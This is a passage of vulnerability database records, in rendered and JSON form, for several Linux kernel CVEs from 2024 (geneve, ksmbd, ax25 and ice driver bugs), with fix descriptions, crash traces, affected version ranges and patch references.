                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.11.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.12.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngeneve: fix header validation in geneve[6]_xmit_skb\n\nsyzbot is able to trigger an uninit-value in geneve_xmit() [1]\n\nProblem : While most ip tunnel helpers (like ip_tunnel_get_dsfield())\nuses skb_protocol(skb, true), pskb_inet_may_pull() is only using\nskb-\u003eprotocol.\n\nIf anything else than ETH_P_IPV6 or ETH_P_IP is found in skb-\u003eprotocol,\npskb_inet_may_pull() does nothing at all.\n\nIf a vlan tag was provided by the caller (af_packet in the syzbot case),\nthe network header might not point to the correct location, and skb\nlinear part could be smaller than expected.\n\nAdd skb_vlan_inet_prepare() to perform a complete mac validation.\n\nUse this in geneve for the moment, I suspect we need to adopt this\nmore broadly.\n\nv4 - Jakub reported v3 broke l2_tos_ttl_inherit.sh selftest\n   - Only call __vlan_get_protocol() for vlan types.\n\nv2,v3 - Addressed Sabrina comments on v1 and v2\n\n[1]\n\nBUG: KMSAN: uninit-value in geneve_xmit_skb drivers/net/geneve.c:910 [inline]\n BUG: KMSAN: uninit-value in geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030\n  geneve_xmit_skb drivers/net/geneve.c:910 [inline]\n  geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030\n  __netdev_start_xmit include/linux/netdevice.h:4903 [inline]\n  netdev_start_xmit include/linux/netdevice.h:4917 [inline]\n  xmit_one net/core/dev.c:3531 [inline]\n  dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3547\n  __dev_queue_xmit+0x348d/0x52c0 net/core/dev.c:4335\n  dev_queue_xmit include/linux/netdevice.h:3091 [inline]\n  packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276\n  packet_snd net/packet/af_packet.c:3081 [inline]\n  packet_sendmsg+0x8bb0/0x9ef0 net/packet/af_packet.c:3113\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg+0x30f/0x380 net/socket.c:745\n  __sys_sendto+0x685/0x830 net/socket.c:2191\n  __do_sys_sendto net/socket.c:2203 [inline]\n  __se_sys_sendto net/socket.c:2199 [inline]\n  __x64_sys_sendto+0x125/0x1d0 net/socket.c:2199\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nUninit was created at:\n  slab_post_alloc_hook mm/slub.c:3804 [inline]\n  slab_alloc_node mm/slub.c:3845 [inline]\n  kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888\n  kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577\n  __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668\n  alloc_skb include/linux/skbuff.h:1318 [inline]\n  alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504\n  sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795\n  packet_alloc_skb net/packet/af_packet.c:2930 [inline]\n  packet_snd net/packet/af_packet.c:3024 [inline]\n  packet_sendmsg+0x722d/0x9ef0 net/packet/af_packet.c:3113\n  sock_sendmsg_nosec net/socket.c:730 [inline]\n  __sock_sendmsg+0x30f/0x380 net/socket.c:745\n  __sys_sendto+0x685/0x830 net/socket.c:2191\n  __do_sys_sendto net/socket.c:2203 [inline]\n  __se_sys_sendto net/socket.c:2199 [inline]\n  __x64_sys_sendto+0x125/0x1d0 net/socket.c:2199\n do_syscall_64+0xd5/0x1f0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nCPU: 0 PID: 5033 Comm: syz-executor346 Not tainted 6.9.0-rc1-syzkaller-00005-g928a87efa423 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:09.345Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/43be590456e1f3566054ce78ae2dbb68cbe1a536"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3adf11d7993518a39bd02b383cfe657ccc0023c"
        },
        {
          "url": "https://git.kernel.org/stable/c/10204df9beda4978bd1d0c2db0d8375bfb03b915"
        },
        {
          "url": "https://git.kernel.org/stable/c/3c1ae6de74e3d2d6333d29a2d3e13e6094596c79"
        },
        {
          "url": "https://git.kernel.org/stable/c/4a1b65d1e55d53b397cb27014208be1e04172670"
        },
        {
          "url": "https://git.kernel.org/stable/c/190d9efa5773f26d6f334b1b8be282c4fa13fd5e"
        },
        {
          "url": "https://git.kernel.org/stable/c/357163fff3a6e48fe74745425a32071ec9caf852"
        },
        {
          "url": "https://git.kernel.org/stable/c/d8a6213d70accb403b82924a1c229e733433a5ef"
        }
      ],
      "title": "geneve: fix header validation in geneve[6]_xmit_skb",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35973",
    "datePublished": "2024-05-20T09:42:00.475Z",
    "dateReserved": "2024-05-17T13:50:33.142Z",
    "dateUpdated": "2025-05-04T12:56:09.345Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26936 (GCVE-0-2024-26936)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:26 – Updated: 2025-05-04 09:00

Title

ksmbd: validate request buffer size in smb2_allocate_rsp_buf()

Summary

In the Linux kernel, the following vulnerability has been resolved: ksmbd: validate request buffer size in smb2_allocate_rsp_buf() The response buffer should be allocated in smb2_allocate_rsp_buf before validating request. But the fields in payload as well as smb2 header is used in smb2_allocate_rsp_buf(). This patch add simple buffer size validation to avoid potencial out-of-bounds in request buffer.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8f3d0bf1d0c62b539…
	https://git.kernel.org/stable/c/21ff9d7d223c5c19c…
	https://git.kernel.org/stable/c/5c20b242d4fed73a9…
	https://git.kernel.org/stable/c/2c27a64a2bc47d9bf…
	https://git.kernel.org/stable/c/17cf0c2794bdb6f39…

Impacted products

Vendor

Product

Version

Linux

Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 8f3d0bf1d0c62b539d54c5b9108a845cff619b99 (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 21ff9d7d223c5c19cb4334009e4c0c83a2f4d674 (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 5c20b242d4fed73a93591e48bfd9772e2322fb11 (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 2c27a64a2bc47d9bfc7c3cf8be14be53b1ee7cb6 (git)
Affected: 0626e6641f6b467447c81dd7678a69c66f7746cf , < 17cf0c2794bdb6f39671265aa18aea5c22ee8c4a (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26936",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-10T18:35:18.289818Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:22:47.084Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.890Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f3d0bf1d0c62b539d54c5b9108a845cff619b99"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/21ff9d7d223c5c19cb4334009e4c0c83a2f4d674"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c20b242d4fed73a93591e48bfd9772e2322fb11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2c27a64a2bc47d9bfc7c3cf8be14be53b1ee7cb6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17cf0c2794bdb6f39671265aa18aea5c22ee8c4a"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/server/smb2pdu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8f3d0bf1d0c62b539d54c5b9108a845cff619b99",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "21ff9d7d223c5c19cb4334009e4c0c83a2f4d674",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "5c20b242d4fed73a93591e48bfd9772e2322fb11",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "2c27a64a2bc47d9bfc7c3cf8be14be53b1ee7cb6",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            },
            {
              "lessThan": "17cf0c2794bdb6f39671265aa18aea5c22ee8c4a",
              "status": "affected",
              "version": "0626e6641f6b467447c81dd7678a69c66f7746cf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/server/smb2pdu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: validate request buffer size in smb2_allocate_rsp_buf()\n\nThe response buffer should be allocated in smb2_allocate_rsp_buf\nbefore validating request. But the fields in payload as well as smb2 header\nis used in smb2_allocate_rsp_buf(). This patch add simple buffer size\nvalidation to avoid potencial out-of-bounds in request buffer."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:09.699Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8f3d0bf1d0c62b539d54c5b9108a845cff619b99"
        },
        {
          "url": "https://git.kernel.org/stable/c/21ff9d7d223c5c19cb4334009e4c0c83a2f4d674"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c20b242d4fed73a93591e48bfd9772e2322fb11"
        },
        {
          "url": "https://git.kernel.org/stable/c/2c27a64a2bc47d9bfc7c3cf8be14be53b1ee7cb6"
        },
        {
          "url": "https://git.kernel.org/stable/c/17cf0c2794bdb6f39671265aa18aea5c22ee8c4a"
        }
      ],
      "title": "ksmbd: validate request buffer size in smb2_allocate_rsp_buf()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26936",
    "datePublished": "2024-05-01T05:26:51.773Z",
    "dateReserved": "2024-02-19T14:20:24.196Z",
    "dateUpdated": "2025-05-04T09:00:09.699Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35887 (GCVE-0-2024-35887)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

ax25: fix use-after-free bugs caused by ax25_ds_del_timer

Summary

In the Linux kernel, the following vulnerability has been resolved: ax25: fix use-after-free bugs caused by ax25_ds_del_timer When the ax25 device is detaching, the ax25_dev_device_down() calls ax25_ds_del_timer() to cleanup the slave_timer. When the timer handler is running, the ax25_ds_del_timer() that calls del_timer() in it will return directly. As a result, the use-after-free bugs could happen, one of the scenarios is shown below: (Thread 1) | (Thread 2) | ax25_ds_timeout() ax25_dev_device_down() | ax25_ds_del_timer() | del_timer() | ax25_dev_put() //FREE | | ax25_dev-> //USE In order to mitigate bugs, when the device is detaching, use timer_shutdown_sync() to stop the timer.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/74204bf9050f7627a…
	https://git.kernel.org/stable/c/c6a368f9c7af4c14b…
	https://git.kernel.org/stable/c/fd819ad3ecf6f3c23…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 74204bf9050f7627aead9875fe4e07ba125cb19b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < c6a368f9c7af4c14b14d390c2543af8001c9bdb9 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < fd819ad3ecf6f3c232a06b27423ce9ed8c20da89 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35887",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:31:26.964668Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:13.609Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.634Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/74204bf9050f7627aead9875fe4e07ba125cb19b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6a368f9c7af4c14b14d390c2543af8001c9bdb9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd819ad3ecf6f3c232a06b27423ce9ed8c20da89"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ax25/ax25_dev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "74204bf9050f7627aead9875fe4e07ba125cb19b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "c6a368f9c7af4c14b14d390c2543af8001c9bdb9",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "fd819ad3ecf6f3c232a06b27423ce9ed8c20da89",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ax25/ax25_dev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nax25: fix use-after-free bugs caused by ax25_ds_del_timer\n\nWhen the ax25 device is detaching, the ax25_dev_device_down()\ncalls ax25_ds_del_timer() to cleanup the slave_timer. When\nthe timer handler is running, the ax25_ds_del_timer() that\ncalls del_timer() in it will return directly. As a result,\nthe use-after-free bugs could happen, one of the scenarios\nis shown below:\n\n      (Thread 1)          |      (Thread 2)\n                          | ax25_ds_timeout()\nax25_dev_device_down()    |\n  ax25_ds_del_timer()     |\n    del_timer()           |\n  ax25_dev_put() //FREE   |\n                          |  ax25_dev-\u003e //USE\n\nIn order to mitigate bugs, when the device is detaching, use\ntimer_shutdown_sync() to stop the timer."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:37.881Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/74204bf9050f7627aead9875fe4e07ba125cb19b"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6a368f9c7af4c14b14d390c2543af8001c9bdb9"
        },
        {
          "url": "https://git.kernel.org/stable/c/fd819ad3ecf6f3c232a06b27423ce9ed8c20da89"
        }
      ],
      "title": "ax25: fix use-after-free bugs caused by ax25_ds_del_timer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35887",
    "datePublished": "2024-05-19T08:34:43.507Z",
    "dateReserved": "2024-05-17T13:50:33.112Z",
    "dateUpdated": "2025-05-04T09:07:37.881Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35911 (GCVE-0-2024-35911)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:35 – Updated: 2025-05-04 12:56

Title

ice: fix memory corruption bug with suspend and rebuild

Summary

In the Linux kernel, the following vulnerability has been resolved: ice: fix memory corruption bug with suspend and rebuild The ice driver would previously panic after suspend. This is caused from the driver *only* calling the ice_vsi_free_q_vectors() function by itself, when it is suspending. Since commit b3e7b3a6ee92 ("ice: prevent NULL pointer deref during reload") the driver has zeroed out num_q_vectors, and only restored it in ice_vsi_cfg_def(). This further causes the ice_rebuild() function to allocate a zero length buffer, after which num_q_vectors is updated, and then the new value of num_q_vectors is used to index into the zero length buffer, which corrupts memory. The fix entails making sure all the code referencing num_q_vectors only does so after it has been reset via ice_vsi_cfg_def(). I didn't perform a full bisect, but I was able to test against 6.1.77 kernel and that ice driver works fine for suspend/resume with no panic, so sometime since then, this problem was introduced. Also clean up an un-needed init of a local variable in the function being modified. PANIC from 6.8.0-rc1: [1026674.915596] PM: suspend exit [1026675.664697] ice 0000:17:00.1: PTP reset successful [1026675.664707] ice 0000:17:00.1: 2755 msecs passed between update to cached PHC time [1026675.667660] ice 0000:b1:00.0: PTP reset successful [1026675.675944] ice 0000:b1:00.0: 2832 msecs passed between update to cached PHC time [1026677.137733] ixgbe 0000:31:00.0 ens787: NIC Link is Up 1 Gbps, Flow Control: None [1026677.190201] BUG: kernel NULL pointer dereference, address: 0000000000000010 [1026677.192753] ice 0000:17:00.0: PTP reset successful [1026677.192764] ice 0000:17:00.0: 4548 msecs passed between update to cached PHC time [1026677.197928] #PF: supervisor read access in kernel mode [1026677.197933] #PF: error_code(0x0000) - not-present page [1026677.197937] PGD 1557a7067 P4D 0 [1026677.212133] ice 0000:b1:00.1: PTP reset successful [1026677.212143] ice 0000:b1:00.1: 4344 msecs passed between update to cached PHC time [1026677.212575] [1026677.243142] Oops: 0000 [#1] PREEMPT SMP NOPTI [1026677.247918] CPU: 23 PID: 42790 Comm: kworker/23:0 Kdump: loaded Tainted: G W 6.8.0-rc1+ #1 [1026677.257989] Hardware name: Intel Corporation M50CYP2SBSTD/M50CYP2SBSTD, BIOS SE5C620.86B.01.01.0005.2202160810 02/16/2022 [1026677.269367] Workqueue: ice ice_service_task [ice] [1026677.274592] RIP: 0010:ice_vsi_rebuild_set_coalesce+0x130/0x1e0 [ice] [1026677.281421] Code: 0f 84 3a ff ff ff 41 0f b7 74 ec 02 66 89 b0 22 02 00 00 81 e6 ff 1f 00 00 e8 ec fd ff ff e9 35 ff ff ff 48 8b 43 30 49 63 ed <41> 0f b7 34 24 41 83 c5 01 48 8b 3c e8 66 89 b7 aa 02 00 00 81 e6 [1026677.300877] RSP: 0018:ff3be62a6399bcc0 EFLAGS: 00010202 [1026677.306556] RAX: ff28691e28980828 RBX: ff28691e41099828 RCX: 0000000000188000 [1026677.314148] RDX: 0000000000000000 RSI: 0000000000000010 RDI: ff28691e41099828 [1026677.321730] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 [1026677.329311] R10: 0000000000000007 R11: ffffffffffffffc0 R12: 0000000000000010 [1026677.336896] R13: 0000000000000000 R14: 0000000000000000 R15: ff28691e0eaa81a0 [1026677.344472] FS: 0000000000000000(0000) GS:ff28693cbffc0000(0000) knlGS:0000000000000000 [1026677.353000] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [1026677.359195] CR2: 0000000000000010 CR3: 0000000128df4001 CR4: 0000000000771ef0 [1026677.366779] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [1026677.374369] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [1026677.381952] PKRU: 55555554 [1026677.385116] Call Trace: [1026677.388023] <TASK> [1026677.390589] ? __die+0x20/0x70 [1026677.394105] ? page_fault_oops+0x82/0x160 [1026677.398576] ? do_user_addr_fault+0x65/0x6a0 [1026677.403307] ? exc_page_fault+0x6a/0x150 [1026677.407694] ? asm_exc_page_fault+0x22/0x30 [1026677.412349] ? ice_vsi_rebuild_set_coalesce+0x130/0x1e0 [ice] [1026677.4186 ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e40a02f06ceb0e0b0…
	https://git.kernel.org/stable/c/11ff8392943e08a35…
	https://git.kernel.org/stable/c/1cb7fdb1dfde1aab6…

Impacted products

Vendor

Product

Version

Linux

Affected: b3e7b3a6ee92ab927f750a6b19615ce88ece808f , < e40a02f06ceb0e0b0183e0b973ac5dbf8f75edec (git)
Affected: b3e7b3a6ee92ab927f750a6b19615ce88ece808f , < 11ff8392943e08a35cb0aa19d638b02db745f170 (git)
Affected: b3e7b3a6ee92ab927f750a6b19615ce88ece808f , < 1cb7fdb1dfde1aab66780b4ba44dba6402172111 (git)
Affected: ca03b327224ed6be2d07f42ee6ee1cdd586cfd5b (git)

Linux

Affected: 6.5
Unaffected: 0 , < 6.5 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35911",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:12:50.504124Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:40.868Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.027Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e40a02f06ceb0e0b0183e0b973ac5dbf8f75edec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/11ff8392943e08a35cb0aa19d638b02db745f170"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1cb7fdb1dfde1aab66780b4ba44dba6402172111"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/intel/ice/ice_lib.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e40a02f06ceb0e0b0183e0b973ac5dbf8f75edec",
              "status": "affected",
              "version": "b3e7b3a6ee92ab927f750a6b19615ce88ece808f",
              "versionType": "git"
            },
            {
              "lessThan": "11ff8392943e08a35cb0aa19d638b02db745f170",
              "status": "affected",
              "version": "b3e7b3a6ee92ab927f750a6b19615ce88ece808f",
              "versionType": "git"
            },
            {
              "lessThan": "1cb7fdb1dfde1aab66780b4ba44dba6402172111",
              "status": "affected",
              "version": "b3e7b3a6ee92ab927f750a6b19615ce88ece808f",
              "versionType": "git"
            },
            {
              "status": "affected",
